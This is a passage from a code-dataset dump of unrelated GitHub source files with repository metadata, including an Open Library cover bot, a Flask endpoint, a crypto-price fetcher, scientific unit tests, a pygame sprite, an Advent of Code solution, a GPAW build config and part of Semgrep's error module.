db_session.bulk_save_objects(\n [EditionCoverData(isbn_13=isbn_13, cover_exists=is_success)]\n )\n db_session.commit()\n logging.info(f\"cover update status {is_success} for {isbn_13}\")\n\n return is_success\n\n\ndef parser_for_zip_with_isbns(cover_zip_path: str, ol: OpenLibrary) -> int:\n logging.info(f\"start time: {datetime.now().timestamp()} for {cover_zip_path}\")\n archive_contents = ZipFile(cover_zip_path, \"r\")\n file_list: list[ZipInfo] = archive_contents.filelist\n\n verified_and_updated_count = 0\n processed_file_list = []\n for file in file_list:\n logging.info(\n f\"processing {file.filename}, processed {len(processed_file_list)} files\"\n )\n try:\n isbn_of_file: str = file.filename.split(\".\")[0]\n is_success = 
verify_and_update_cover(isbn_of_file, archive_contents, ol)\n if is_success:\n verified_and_updated_count += 1\n processed_file_list.append(processed_file_list)\n except Exception as e:\n logging.error(\n f\"file: {file.filename}, zip path: {cover_zip_path}. Error: {e}\"\n )\n\n logging.info(f\"end time: {datetime.now().timestamp()} for {cover_zip_path}\")\n return verified_and_updated_count\n\n\nif __name__ == \"__main__\":\n args = sys.argv\n if len(args) != 2:\n raise Exception(\"python main.py \")\n\n ol = get_ol()\n\n user_provided_path = args[1]\n zip_paths = (\n [\n os.path.join(user_provided_path, f)\n for f in os.listdir(user_provided_path)\n if f.endswith(\".zip\")\n ]\n if os.path.isdir(user_provided_path)\n else [user_provided_path]\n )\n for zip_path in zip_paths:\n logging.info(f\"Processing: {zip_path}\")\n verified_and_updated_count = parser_for_zip_with_isbns(zip_path, ol)\n logging.info(f\"Verified and updated {verified_and_updated_count} ISBNs\")\n","repo_name":"internetarchive/openlibrary-bots","sub_path":"BWBCoverBot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"48"} +{"seq_id":"11523396342","text":"#coding=utf-8\nfrom flask import Blueprint, jsonify, request\nfrom model.type import FailResp, SuccessResp\nfrom db.select import select\n\nread = Blueprint('read', __name__)\n\n@read.route(\"/api/read\", methods=['GET'])\ndef index():\n city = request.args.get('city')\n if city == \"\":\n return jsonify(FailResp())\n data = select(city)\n return jsonify(SuccessResp(data))\n\n\n","repo_name":"Muxxs/wuhan2020_api","sub_path":"control/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"48"} +{"seq_id":"24932419576","text":"from django.db import models\nimport requests, json\nimport time\nfrom datetime import datetime\n\n\n#Coinbase Exchange\ncoinbase_btc_buy_url = \"https://api.coinbase.com/v2/prices/BTC-USD/buy\"\ncoinbase_btc_sell_url = \"https://api.coinbase.com/v2/prices/BTC-USD/sell\"\ncoinbase_eth_buy_url = \"https://api.coinbase.com/v2/prices/ETH-USD/buy\"\ncoinbase_eth_sell_url = \"https://api.coinbase.com/v2/prices/ETH-USD/sell\"\n\nresponse1 = requests.get(coinbase_btc_buy_url)\nresponse2 = requests.get(coinbase_btc_sell_url)\nresponse3 = requests.get(coinbase_eth_buy_url)\nresponse4 = requests.get(coinbase_eth_sell_url)\n\nbtc_buy_price = response1.json()\nbtc_sell_price = response2.json()\neth_buy_price = response3.json()\neth_sell_price = response4.json()\n\n#Gemini Exchange\nbase_url = \"https://api.gemini.com/v1\"\nbtc_response = requests.get(base_url + \"/pubticker/btcusd\")\nbtc_data = btc_response.json()\neth_response = requests.get(base_url + \"/pubticker/ethusd\")\neth_data = eth_response.json()\n\nclass BitcoinPrices:\n coinbase_btc_buy_price = btc_buy_price['data']['amount']\n coinbase_btc_sell_price = btc_sell_price['data']['amount']\n gemini_btc_buy_price = btc_data['bid']\n gemini_btc_sell_price =btc_data['ask']\n\n\n def __str__(self):\n\n return \"coinbase_btc_buy_price: \" + btc_buy_price['data']['amount'] + \"\\ncoinbase_btc_sell_price: \" +btc_sell_price['data']['amount']+\"\\ngemini_btc_buy_price: \" + btc_data['bid']+\"\\ngemini_btc_sell_price: \"+ btc_data['ask']\n\n\n\n\nclass EthereumPrices:\n coinbase_eth_buy_price = eth_buy_price['data']['amount']\n coinbase_eth_sell_price = eth_sell_price['data']['amount']\n 
gemini_eth_buy_price = eth_data['bid']\n gemini_eth_sell_price = eth_data['ask']\n\n\n def __str__(self):\n return \"coinbase_eth_buy_price: \"+eth_buy_price['data']['amount']+\"\\ncoinbase_eth_sell_price: \"+eth_sell_price['data']['amount']+\"\\ngemini_eth_buy_price: \"+eth_data['bid']+\"\\ngemini_eth_sell_price: \"+eth_data['ask']\nif __name__ == '__main__':\n\n print(BitcoinPrices())\n print(\" \")\n print(EthereumPrices())\n","repo_name":"cchristi10/crypto-price-recommend-repository","sub_path":"price_project/price_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32714837055","text":"import sys\nfrom datetime import datetime\n\nif len(sys.argv) > 1:\n date_time = sys.argv[1]\n dt_obj = datetime.strptime(str(date_time) + ' 00:00:01', '%m.%d.%Y %H:%M:%S')\n millisec = dt_obj.timestamp() * 1000\n print(millisec)\nelse:\n print(\" No arguments \")\n\n\n\n","repo_name":"RoundTower-io/epoch_json_utilities","sub_path":"timestamp.py","file_name":"timestamp.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42296719275","text":"# Distributed under the MIT License.\n# See LICENSE.txt for details.\n\nimport unittest\n\nimport numpy as np\n\nfrom spectre.DataStructures import DataVector\nfrom spectre.NumericalAlgorithms.LinearOperators import (\n absolute_truncation_error,\n power_monitors,\n relative_truncation_error,\n)\nfrom spectre.Spectral import (\n Basis,\n Mesh1D,\n Mesh2D,\n Quadrature,\n logical_coordinates,\n)\n\n\nclass TestPowerMonitors(unittest.TestCase):\n # Check the case for a constant function where the power monitors\n # should be given by the first basis function\n def test_power_monitors(self):\n num_points_per_dimension = 4\n\n extent = num_points_per_dimension\n basis = Basis.Legendre\n quadrature = Quadrature.GaussLobatto\n mesh = Mesh2D(extent, basis, quadrature)\n\n test_vec = np.ones(mesh.number_of_grid_points())\n\n test_array = power_monitors(test_vec, mesh)\n np_test_array = np.asarray(test_array)\n\n check_vec_0 = np.zeros(num_points_per_dimension)\n check_vec_0[0] = 1.0 / np.sqrt(num_points_per_dimension)\n\n check_vec_1 = np.zeros(num_points_per_dimension)\n check_vec_1[0] = 1.0 / np.sqrt(num_points_per_dimension)\n\n np_check_array = np.array([check_vec_0, check_vec_1])\n\n np.testing.assert_allclose(np_test_array, np_check_array, 1e-12, 1e-12)\n\n # Check that the truncation error for a straight line is consistent with the\n # analytic expectation\n def test_truncation_error(self):\n mesh = Mesh1D(2, Basis.Legendre, Quadrature.GaussLobatto)\n logical_coords = np.array(logical_coordinates(mesh))[0]\n\n # Define the test function\n slope, offset = 0.1, 1.0\n test_data = slope * logical_coords + offset\n\n # For a linear function the slope and offset correspond to the power\n # monitor values\n # The weighted average of the highest modes is\n avg = np.log10(np.abs(slope)) * np.exp(-0.25) + np.log10(\n np.abs(offset)\n ) * np.exp(-0.25)\n avg = avg / (np.exp(-0.25) + np.exp(-0.25))\n expected_relative_truncation_error = np.power(10.0, avg)\n expected_absolute_truncation_error = (\n np.max(np.abs(test_data)) * expected_relative_truncation_error\n )\n\n # Test relative truncation_error\n rel_error = relative_truncation_error(test_data, mesh)\n np.testing.assert_allclose(\n rel_error, expected_relative_truncation_error, 1e-12, 
1e-12\n        )\n\n        # Test absolute truncation_error\n        abs_error = absolute_truncation_error(test_data, mesh)\n        np.testing.assert_allclose(\n            abs_error, expected_absolute_truncation_error, 1e-12, 1e-12\n        )\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","repo_name":"sxs-collaboration/spectre","sub_path":"tests/Unit/NumericalAlgorithms/LinearOperators/Python/Test_PowerMonitors.py","file_name":"Test_PowerMonitors.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":135,"dataset":"github-code","pt":"48"}
{"seq_id":"21239955956","text":"import pygame\nimport shared\nfrom pygame.sprite import *\n\nclass ChasingNeeb(pygame.sprite.Sprite):\n\t\"\"\" Creates a ChasingNeeb sprite \"\"\"\n\t\t\n\tdef __init__(self):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\t\n\t\tself.font = pygame.font.SysFont(\"Verdana\", 13)\n\t\tself.imageMaster = self.font.render(\":3\",\n\t\t\tTrue, (0,0,0), (0xFF, 0xFF, 0xFF))\n\t\t\n\t\tself.image = self.imageMaster\n\t\tself.rect = self.image.get_rect()\n\t\t\n\t\tself.x = 0\n\t\tself.y = 0\n\t\tself.width = 75\n\t\tself.height = 43\n\t\tself.rect.topleft = (self.x, self.y)\n\n\t\tself.pressed = False\n\t\t\n\t\t#self.neebFrames = []\t\t\n\t\tself.GOING_UP = 0\n\t\tself.GOING_DOWN = 1\n\t\tself.INACTIVE = 2\n\t\tself.DIE = 3\n\t\tself.WALKING = 4\n\t\tself.RUN_AWAY_FROM_BUFORD = 5\n\t\t\n\t\tself.status = self.INACTIVE\n\t\tself.currentFrameIndex = 0\n\t\tself.frames = []\n\t\t\n\t\t#Number represents amount of frames to pause for walking\n\t\tself.WALK_FAST = 7\n\t\tself.WALK_REGULAR = 15\n\t\tself.WALK_SLOW = 25\n\t\t\n\t\tself.walkSpeed_ = self.WALK_FAST\n\t\tself.walkTimer = 0\n\t\t\n\tdef setWalkFast(self):\n\t\tself.walkSpeed_ = self.WALK_FAST\n\t\t\n\tdef setWalkRegular(self):\n\t\tself.walkSpeed_ = self.WALK_REGULAR\n\t\t\n\tdef setWalkSlow(self):\n\t\tself.walkSpeed_ = self.WALK_SLOW\n\t\n\tdef setImage(self, filename):\n\t\tfilepath = shared.path(\"data\", filename)\n\t\timage = shared.loadImage(filepath, True)\n\t\tself.frames = self.__generateNeebAnimation(image)\n\t\tcurrentFrame = len(self.frames) - 1\n\t\tself.imageFrame = self.__setCurrentFrame( currentFrame )\n\n\tdef __setCurrentFrame(self, frame):\n\t\tself.imageMaster = self.frames[frame]\n\t\t\n\tdef setIsBufordClose(self, isClose):\n\t\tif isClose:\n\t\t\tself.status = self.RUN_AWAY_FROM_BUFORD\n\t\telse:\n\t\t\tself.status = self.WALKING\n\n\tdef walkTowardsGirl(self, girl):\n\t\tif ( self.status == self.WALKING ):\n\t\t\tprint(\"RUN TOWARDS!\")\n\t\t\tif (self.isCharacterAbove(girl.y)):\n\t\t\t\tself.y -= 5\n\t\t\telif(self.isCharacterBelow(girl.y)):\n\t\t\t\tself.y += 5\n\t\t\t\t\n\t\t\tif(self.isCharacterLeft(girl.x)):\n\t\t\t\tself.x -=5\n\t\t\telif(self.isCharacterRight(girl.x)):\n\t\t\t\tself.x +=5\n\t\t\t\n\tdef runAwayFromBuford(self, buford):\n\t\tif (self.status == self.RUN_AWAY_FROM_BUFORD):\n\t\t\tprint(\"RUN AWAYYYY!\")\n\t\t\tif (self.isCharacterAbove(buford.y)):\n\t\t\t\tself.y += 10\n\t\t\telif(self.isCharacterBelow(buford.y)):\n\t\t\t\tself.y -= 10\n\t\t\tif(self.isCharacterLeft(buford.x)):\n\t\t\t\tself.x -= 10\n\t\t\telif(self.isCharacterRight(buford.x)):\n\t\t\t\tself.x += 10\n\t\n\tdef isCharacterAbove(self, girlY):\n\t\treturn ( girlY < self.y )\n\t\t\n\tdef isCharacterBelow(self, girlY):\n\t\treturn ( girlY > self.y )\n\t\t\n\tdef isCharacterLeft(self, girlX):\n\t\treturn ( girlX < self.x )\n\t\t\n\tdef isCharacterRight(self, girlX):\n\t\treturn ( girlX > self.x )\n\n\t\"\"\" Generates a set of surfaces to create a neeb 
growing animation \"\"\"\n\tdef __generateNeebAnimation(self, image):\n\t\timages = []\n\t\tmaster_image = image\n\n\t\tmaster_width, master_height = master_image.get_size()\n\t\twidth = self.width\n\t\theight = self.height\n\t\tfor index in range(int(master_width/width)):\n\t\t\timages.append(master_image.subsurface((index*width,0,width,height)))\n\n\t\t#print( len(images) )\n\t\treturn images\n\t\t\t\n\tdef update(self):\n\t\t#if self.status == self.GOING_UP:\n\t\t#\tself.__animateUp()\n\t\t#elif self.status == self.GOING_DOWN:\n\t\t#\tself.__animateDown()\n\t\t#elif self.status == self.DIE:\n\t\t#\tself.__animateKill()\n\t\t\t\n\t\t#self.__setCurrentFrame(self.currentFrameIndex)\n\t\t\n\t\tself.image = self.imageMaster\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.topleft = (self.x, self.y)\n\t\t\n\t\t#self.__updateAnimationState()\n\t\t\n\t\tself.CheckEvents()\n\t\n\tdef CheckEvents(self):\n\t\tself.mouseDown()\n\t\t\n\t\t#keys = pygame.key.get_pressed()\n\t\t#if keys[pygame.K_LEFT]:\n\t\t#\tself.moveLeft()\n\t\t#if keys[pygame.K_RIGHT]:\n\t\t#\tself.moveRight()\n\t\t#if keys[pygame.K_UP]:\n\t\t#\tself.moveUp()\n\t\t#if keys[pygame.K_DOWN]:\n\t\t#\tself.moveDown()\n\t\t\t\n\tdef moveLeft(self):\n\t\tself.x -= 5\n\t\t\n\tdef moveRight(self):\n\t\tself.x += 5\n\t\t\n\tdef moveUp(self):\n\t\tself.y -= 5\n\t\t\n\tdef moveDown(self):\n\t\tself.y += 5\n\t\t\t\n\tdef mouseDown(self):\n\t\t\"\"\" boolean function. Returns True if the mouse is \n\t\t\tclicked over the sprite, False otherwise\n\t\t\"\"\"\n\t\t#print(\"Check Mouse Down?\")\n\t\tself.pressed = False\n\t\tif pygame.mouse.get_pressed() == (1, 0, 0):\n\t\t\tif self.rect.collidepoint(pygame.mouse.get_pos()):\n\t\t\t\tprint(\"MOUSE DOWN\")\n\t\t\t\tself.pressed = True\n\t\treturn self.pressed\n\n\tdef clicked(self):\n\t\t\"\"\" Boolean function. 
Returns True only if mouse\n\t\t\tis pressed and released over sprite\n\t\t\"\"\"\n\t\t#print(\"CHECK CLICKED?!\")\n\t\treleased = False\n\t\tif self.pressed:\n\t\t\tif pygame.mouse.get_pressed() == (0, 0, 0):\n\t\t\t\tif self.rect.collidepoint(pygame.mouse.get_pos()):\n\t\t\t\t\tprint(\"CLICKED!\")\n\t\t\t\t\treleased = True\n\t\t\treturn released\n\n\tdef kill(self):\n\t\tself.isAnimationActive = False\n\t\tprint(\"KILLED!\")\n\t\tself.__animateKill()\n\n\tdef __animateKill(self):\n\t\tprint(\"ANIMATING DEATH\")\n\t\t\n\tdef __animateUp(self):\n\t\t#print(\"ANIMATING UP\")\n\t\tprint(\"CurrentIndex: \", self.currentFrameIndex, \" TotalFrames: \", len( self.frames ) )\n\t\tif (self.currentFrameIndex < len( self.frames ) - 1 ):\n\t\t\tself.currentFrameIndex += 1\n\t\t\tprint(\"New Index\", self.currentFrameIndex)\n\t\n\tdef __animateDown(self):\n\t\t#print(\"ANIMATING DOwn\")\n\t\tif (self.currentFrameIndex > 0 ):\n\t\t\tself.currentFrameIndex -=1\n\t\t\t\n\tdef __updateAnimationState(self):\n\t\t#print(\"UPDATE ANIMATION STATE\")\n\t\tif( self.currentFrameIndex == 0 ):\n\t\t\tself.status = self.INACTIVE\n\t\telif( self.currentFrameIndex >= len( self.frames )-1 ):\n\t\t\tself.status = self.GOING_DOWN\n\n\tdef popUp(self):\n\t\tprint (\"POP UP\")\n\t\tself.status = self.GOING_UP\n\t\n\tdef popDown(self):\n\t\tprint (\"POP DOWN\")\n\t\tself.status = self.GOING_DOWN\n\nif __name__ == \"__main__\":\n\timport scene \n\tfrom scene import Scene\n\tfrom Girl import Girl\n\tfrom Buford import Buford\n\tgame = Scene()\n\tbuford = Buford()\n\tbuford.setImage(\"buford.gif\")\n\tgirl = Girl()\n\tgirl.setImage(\"girl.png\")\n\tchasingNeeb = ChasingNeeb()\n\tchasingNeeb.setImage(\"neeb_still.gif\")\n\tgame.sprites = [buford, girl, chasingNeeb]\n\tgame.start()\n","repo_name":"townsean/Buford","sub_path":"BufordSave/ChasingNeeb.py","file_name":"ChasingNeeb.py","file_ext":"py","file_size_in_byte":5805,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"71728449746","text":"\ndef read_input(file_name):\n file = open(file_name, 'r')\n nums = []\n for line in file:\n line = int(line.strip())\n nums.append(line)\n return nums\n\n\ndef part1(preamble_len, nums):\n for i in range(preamble_len, len(nums)):\n num = nums[i]\n preamble = nums[i-preamble_len:i]\n valid = False\n for j in range(preamble_len):\n dif = num - preamble[j]\n if dif in (preamble[0:j] + preamble[j+1:preamble_len]):\n valid = True\n break\n if not valid:\n return num\n\n\ndef sum_list(nums):\n total = 0\n for num in nums:\n total += num\n return total\n\n\ndef part2(nums, inv_num):\n for i in range(len(nums)):\n for j in range(i, len(nums)):\n sub_list = nums[i:j+1]\n sum_sub_list = sum_list(sub_list)\n if sum_sub_list == inv_num:\n return min(sub_list) + max(sub_list)\n elif sum_sub_list > inv_num:\n break\n\n\ndef main():\n file = \"Part1Input.txt\"\n preamble_len = 25\n nums = read_input(file)\n inv_num = part1(preamble_len, nums)\n print(inv_num)\n print(part2(nums, inv_num))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ZacharyRJohnson/Advent-of-Code","sub_path":"2020/Day9/day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44074984121","text":"\"\"\"User provided customizations.\n\nHere one changes the default arguments for compiling _gpaw.so (serial)\nand gpaw-python (parallel).\n\nHere are all the lists that can be modified:\n\n* 
libraries\n* library_dirs\n* include_dirs\n* extra_link_args\n* extra_compile_args\n* runtime_library_dirs\n* extra_objects\n* define_macros\n* mpi_libraries\n* mpi_library_dirs\n* mpi_include_dirs\n* mpi_runtime_library_dirs\n* mpi_define_macros\n\nTo override use the form:\n\n libraries = ['somelib', 'otherlib']\n\nTo append use the form\n\n libraries += ['somelib', 'otherlib']\n\"\"\"\n\n# compiler = 'gcc'\n# mpicompiler = 'mpicc' # use None if you don't want to build a gpaw-python\n# mpilinker = 'mpicc'\n# platform_id = ''\n# scalapack = False\n\n# Use ScaLAPACK:\n# Warning! At least scalapack 2.0.1 is required!\n# See https://trac.fysik.dtu.dk/projects/gpaw/ticket/230\nif scalapack:\n libraries += ['scalapack-openmpi',\n 'blacsCinit-openmpi',\n 'blacs-openmpi']\n define_macros += [('GPAW_NO_UNDERSCORE_CBLACS', '1')]\n define_macros += [('GPAW_NO_UNDERSCORE_CSCALAPACK', '1')]\n\n# LibXC:\n# In order to link libxc installed in a non-standard location\n# (e.g.: configure --prefix=/home/user/libxc-2.0.1-1), use:\n\n# - static linking:\nif 0:\n include_dirs += ['/home/user/libxc-2.0.1-1/include']\n extra_link_args += ['/home/user/libxc-2.0.1-1/lib/libxc.a']\n if 'xc' in libraries:\n libraries.remove('xc')\n\n# - dynamic linking (requires rpath or setting LD_LIBRARY_PATH at runtime):\nif 0:\n include_dirs += ['/home/user/libxc-2.0.1-1/include']\n library_dirs += ['/home/user/libxc-2.0.1-1/lib']\n # You can use rpath to avoid changing LD_LIBRARY_PATH:\n # extra_link_args += ['-Wl,-rpath=/home/user/libxc-2.0.1-1/lib']\n if 'xc' not in libraries:\n libraries.append('xc')\n\n\n# libvdwxc:\nif 0:\n libvdwxc = True\n path = '/home/user/libvdwxc'\n extra_link_args += ['-Wl,-rpath=%s/lib' % path]\n library_dirs += ['%s/lib' % path]\n include_dirs += ['%s/include' % path]\n libraries += ['vdwxc']\n\n\n# Build MPI-interface into _gpaw.so:\nif 0:\n compiler = 'mpicc'\n define_macros += [('PARALLEL', '1')]\n mpicompiler = None\n","repo_name":"ray38/gpawDFT","sub_path":"customize.py","file_name":"customize.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"33417247014","text":"import dataclasses\nimport inspect\nimport sys\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import cast\nfrom typing import List\nfrom typing import Optional\nfrom typing import Sequence\nfrom typing import Tuple\n\nimport attr\n\nimport semgrep.semgrep_interfaces.semgrep_output_v1 as out\nfrom semgrep.constants import Colors\nfrom semgrep.rule_lang import Position\nfrom semgrep.rule_lang import SourceTracker\nfrom semgrep.rule_lang import Span\nfrom semgrep.util import with_color\nfrom semgrep.verbose_logging import getLogger\n\nlogger = getLogger(__name__)\n\nOK_EXIT_CODE = 0\nFINDINGS_EXIT_CODE = 1\nFATAL_EXIT_CODE = 2\nTARGET_PARSE_FAILURE_EXIT_CODE = 3\nRULE_PARSE_FAILURE_EXIT_CODE = 4\nUNPARSEABLE_YAML_EXIT_CODE = 5\n# the commented one below are not used anymore\n# NEED_ARBITRARY_CODE_EXEC_EXIT_CODE = 6\nMISSING_CONFIG_EXIT_CODE = 7\nINVALID_LANGUAGE_EXIT_CODE = 8\n# MATCH_TIMEOUT_EXIT_CODE = 9\n# MATCH_MAX_MEMORY_EXIT_CODE = 10\n# LEXICAL_ERROR_EXIT_CODE = 11\n# TOO_MANY_MATCHES_EXIT_CODE = 12\nINVALID_API_KEY_EXIT_CODE = 13\nSCAN_FAIL_EXIT_CODE = 14\n\ndefault_level = out.ErrorSeverity(out.Error_())\n\n\nclass SemgrepError(Exception):\n \"\"\"\n Parent class of all exceptions we anticipate in Semgrep commands\n\n All Semgrep Exceptions are caught and their error messages\n are displayed to 
the user.\n\n For pretty-printing, exceptions should override `__str__`.\n \"\"\"\n\n # In theory we should define those fields here:\n # code: int\n # level: out.ErrorSeverity\n # type_: out.CoreErrorKind\n\n def __init__(\n self,\n *args: object,\n code: int = FATAL_EXIT_CODE,\n level: out.ErrorSeverity = default_level,\n ) -> None:\n self.code = code\n self.level = level\n super().__init__(*args)\n\n def to_CliError(self) -> out.CliError:\n err = out.CliError(code=self.code, type_=self.type_(), level=self.level)\n return self.adjust_CliError(err)\n\n # to be overridden in children\n def type_(self) -> out.ErrorType:\n return out.ErrorType(out.SemgrepError())\n\n # to be overridden in children\n def adjust_CliError(self, base: out.CliError) -> out.CliError:\n \"\"\"\n Default implementation. Subclasses should override to provide custom information.\n \"\"\"\n return dataclasses.replace(base, message=str(self))\n\n def format_for_terminal(self) -> str:\n level_tag = (\n with_color(Colors.red, \"[\", bgcolor=Colors.red)\n + with_color(\n Colors.forced_white,\n cast(str, self.level.to_json()).upper(),\n bgcolor=Colors.red,\n bold=True,\n )\n + with_color(Colors.red, \"]\", bgcolor=Colors.red)\n )\n\n return f\"{level_tag} {self}\"\n\n\n# used in text and sarif output, and currently also stored in our metrics\n# payload.errors.errors\ndef error_type_string(type_: out.ErrorType) -> str:\n # convert to the same string of out.ParseError for now\n if isinstance(type_.value, out.PartialParsing):\n return error_type_string(out.ErrorType(out.ParseError()))\n # constructors with arguments\n if isinstance(type_.value, out.PatternParseError):\n return error_type_string(out.ErrorType(out.PatternParseError0()))\n if isinstance(type_.value, out.IncompatibleRule_):\n return error_type_string(out.ErrorType(out.IncompatibleRule0()))\n # All the other cases don't have arguments in Semgrep_output_v1.atd\n # and have some annotations to generate the right string\n else:\n return str(type_.to_json())\n\n\n@dataclass(frozen=True)\nclass SemgrepCoreError(SemgrepError):\n code: int\n level: out.ErrorSeverity\n # TODO: spans are used only for PatternParseError\n spans: Optional[List[out.ErrorSpan]]\n core: out.CoreError\n\n def type_(self) -> out.ErrorType:\n return self.core.error_type\n\n def adjust_CliError(self, base: out.CliError) -> out.CliError:\n base = dataclasses.replace(base, message=str(self))\n if self.core.rule_id:\n base = dataclasses.replace(base, rule_id=self.core.rule_id)\n\n # For rule errors path is a temp file so for now will just be confusing to add\n if not isinstance(\n self.core.error_type.value, out.RuleParseError\n ) and not isinstance(self.core.error_type.value, out.PatternParseError):\n base = dataclasses.replace(base, path=self.core.location.path)\n\n if self.spans:\n base = dataclasses.replace(base, spans=self.spans)\n\n return base\n\n @property\n def is_special_interfile_analysis_error(self) -> bool:\n \"\"\"\n These errors indicate that multifile analysis did not\n successfully ran, but we were able to get results anyway.\n They should not block, but they are still errors so that\n they display as errors\n\n TODO remove this when we remove the interfile specific errors\n \"\"\"\n return isinstance(\n self.core.error_type.value, out.OutOfMemoryDuringInterfile\n ) or isinstance(self.core.error_type.value, out.TimeoutDuringInterfile)\n\n def is_timeout(self) -> bool:\n \"\"\"\n Return if this error is a match timeout\n \"\"\"\n return isinstance(self.core.error_type.value, 
out.Timeout)\n\n @property\n def _error_message(self) -> str:\n \"\"\"\n Generate error message exposed to user\n \"\"\"\n if self.core.rule_id:\n # For rule errors, the path is a temporary JSON file containing\n # the rule(s).\n if isinstance(self.core.error_type.value, out.RuleParseError) or isinstance(\n self.core.error_type.value, out.PatternParseError\n ):\n error_context = f\"in rule {self.core.rule_id.value}\"\n elif isinstance(self.core.error_type.value, out.IncompatibleRule_):\n error_context = self.core.rule_id.value\n elif isinstance(self.core.error_type.value, out.MissingPlugin):\n error_context = f\"for rule {self.core.rule_id.value}\"\n else:\n # This message is suitable only if the error is in a target file:\n error_context = f\"when running {self.core.rule_id.value} on {self.core.location.path.value}\"\n else:\n error_context = f\"at line {self.core.location.path.value}:{self.core.location.start.line}\"\n\n return f\"{error_type_string(self.core.error_type)} {error_context}:\\n {self.core.message}\"\n\n @property\n def _stack_trace(self) -> str:\n \"\"\"\n Returns stack trace if error_type is Fatal error else returns empty strings\n \"\"\"\n if isinstance(self.core.error_type.value, out.FatalError):\n error_trace = self.core.details or \"\"\n return f\"\\n====[ BEGIN error trace ]====\\n{error_trace}=====[ END error trace ]=====\\n\"\n else:\n return \"\"\n\n def __str__(self) -> str:\n return self._error_message + self._stack_trace\n\n # TODO: I didn't manage to get out.Error to be hashable because it contains lists or\n # objects (e.g., Error_) which are not hashable\n def __hash__(self) -> int:\n return hash(\n (\n self.code,\n self.level,\n self.core.rule_id,\n self.core.error_type.kind,\n self.core.location.path.value,\n self.core.location.start,\n self.core.location.end,\n self.core.message,\n self.core.details,\n )\n )\n\n\n@attr.s(auto_attribs=True, frozen=True)\nclass FilesNotFoundError(SemgrepError):\n level = out.ErrorSeverity(out.Error_())\n code = FATAL_EXIT_CODE\n paths: Sequence[Path]\n\n def __str__(self) -> str:\n lines = (f\"File not found: {pathname}\" for pathname in self.paths)\n return \"\\n\".join(lines)\n\n\ndef span_list_to_tuple(spans: List[Span]) -> Tuple[Span, ...]:\n \"\"\"\n Helper converter so mypy can track that we are converting\n from list of spans to tuple of spans\n \"\"\"\n return tuple(spans)\n\n\ndef add_to_line(pos: Position, num_lines: int) -> Position:\n return Position(col=pos.col, line=pos.line + num_lines, offset=-1)\n\n\ndef previous_line(pos: Position) -> Position:\n return add_to_line(pos, -1)\n\n\ndef next_line(pos: Position) -> Position:\n return add_to_line(pos, 1)\n\n\n@attr.s(auto_attribs=True, eq=True, frozen=True)\nclass ErrorWithSpan(SemgrepError):\n \"\"\"\n In general, you should not be constructing ErrorWithSpan directly, and instead be constructing a subclass\n that sets the code.\n\n Error which will print context from the Span. You should provide the most specific span possible,\n eg. if the error is an invalid key, provide exactly the span for that key. You can then expand what's printed\n with span.with_context(...). 
Conversely, if you don't want to display the entire span, you can use `span.truncate`\n\n The __str__ method produces the pretty-printed error.\n Here is what the generated error will look like:\n\n : \n --> :\n 1 | rules:\n 2 | - id: eqeq-is-bad\n 3 | pattern-inside: foo(...)\n | ^^^^^^^^^^^^^^\n 4 | patterns:\n 5 | - pattern-not: 1 == 1\n = help: \n \n\n :param short_msg: 1 or 2 word description of the problem (eg. missing key)\n :param level: How bad is the problem? error,warn, etc.\n :param spans: A list of spans to display for context.\n :help help: An optional hint about how to fix the problem\n :cause cause: The underlying exception\n \"\"\"\n\n short_msg: str = attr.ib()\n long_msg: Optional[str] = attr.ib()\n spans: List[Span] = attr.ib(converter=span_list_to_tuple)\n help: Optional[str] = attr.ib(default=None)\n\n def __attrs_post_init__(self) -> None:\n if not hasattr(self, \"code\"):\n raise ValueError(\"Inheritors of SemgrepError must define an exit code\")\n\n if not hasattr(self, \"level\"):\n raise ValueError(\"Inheritors of SemgrepError must define a level\")\n\n def adjust_CliError(self, base: out.CliError) -> out.CliError:\n base = dataclasses.replace(\n base,\n short_msg=self.short_msg,\n long_msg=self.long_msg,\n level=self.level,\n spans=[s.to_ErrorSpan() for s in self.spans],\n )\n # otherwise, we end up with `help: null` in JSON\n if self.help:\n base = dataclasses.replace(base, help=self.help)\n return base\n\n @staticmethod\n def _line_number_width(span: Span) -> int:\n return len(str((span.context_end or span.end).line)) + 1\n\n @staticmethod\n def _format_line_number(span: Span, line_number: Optional[int]) -> str:\n \"\"\"\n Produce a string like:\n ` 10 |`\n\n The amount of padding is set for printing within `span` (so it handles up to `context_end.line`)\n \"\"\"\n # line numbers are 0 indexed\n width = ErrorWithSpan._line_number_width(span)\n if line_number is not None:\n base_str = str(line_number)\n assert len(base_str) < width\n return with_color(Colors.bright_blue, base_str.ljust(width) + \"| \")\n else:\n return with_color(Colors.bright_blue, \"\".ljust(width) + \"| \")\n\n def _format_code_segment(\n self,\n start: Position,\n end: Position,\n source: List[str],\n part_of_span: Span,\n ) -> List[str]:\n \"\"\"\n Line by line output for a snippet of code from `start_line` to `end_line`\n Each line will be annotated with a line number, properly spaced according to\n the highest line number required to render `span`\n\n :param start: start position\n :param end: end position\n\n :returns A list of strings, suitable to be combined with `'\\n'.join(...)`\n eg:\n List[\n \"5 | def my_func():\",\n \"6 | return True\"\n ]\n \"\"\"\n # -1 because positions are 1-indexed\n code_segment = source[start.line - 1 : end.line]\n snippet = []\n for line_num, line in 